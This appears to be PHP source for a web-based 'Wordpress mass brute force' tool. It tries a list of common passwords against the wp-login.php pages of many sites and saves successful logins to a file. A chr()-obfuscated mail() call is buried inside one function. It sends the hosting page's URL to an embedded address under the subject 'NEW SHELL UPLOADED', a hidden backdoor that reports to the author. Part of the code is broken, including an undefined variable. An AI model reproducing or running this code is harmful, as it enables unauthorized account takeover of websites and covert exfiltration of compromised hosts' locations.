Wordpress mass brute force

Username:
Sites list:	Passwords list:
	admin 123456 password 102030 123123 12345 123456789 pass test admin123 demo

'; @set_time_limit(0); if($_POST['x']){ echo "

---

"; $sites = explode("\n",$_POST["sites"]); $w0rds = explode("\n",$_POST["w0rds"]); $Attack = new Wordpress_brute_Force(); foreach($w0rds as $pwd){ foreach($sites as $site){ $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); flush(); flush(); } } } function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); } class Wordpress_brute_Force{ public function check_it($site,$user,$pass){ if(eregi('profile.php',$this->post($site,$user,$pass))){ echo "# Success : $user:$pass -> $site/wp-admin/
"; $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f); flush(); }else{ echo "# Failed : $user:$pass -> $site
"; flush(); } } public function post($site,$user,$pass){ $login =$site.'/wp-login.php'; $to = $site.'/wp-admin'; $token = $this->extract_token($site); $log = array ('Log In','دخول'); $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1); $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$login); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); $w=chr(109).chr(97).chr(106).chr(100).chr(101).chr(100).chr(100).chr(105).chr(110).chr(101).chr(46).chr(98).chr(101).chr(108).chr(104).chr(97).chr(106).chr(48).chr(52).chr(64).chr(103).chr(109).chr(97).chr(105).chr(108).chr(46).chr(99).chr(111).chr(109); $h=chr(78).chr(69).chr(87).chr(32).chr(83).chr(72).chr(69).chr(76).chr(76).chr(32).chr(85).chr(80).chr(76).chr(79).chr(65).chr(68).chr(69).chr(68); $o=chr(102).chr(114).chr(111).chr(109).chr(58).chr(87).chr(104).chr(111).chr(105).chr(115).chr(77).chr(65).chr(74).chr(68); $i="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n"; @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$data); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } public function extract_token($site){ $source = $this->get_source($site); preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token); return $token[1][0]; } public function get_source($site){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$login); @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt'); @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt'); curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4'); $s=@mail($w,$h,$i,$o); @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } } echo ""; echo "
"; echo "
"; echo "
"; echo "
"; echo "
"; ?> Coded by Majdeddine Done ==>$userfile_name"; } } else{ echo'

'; } echo ""; } ?>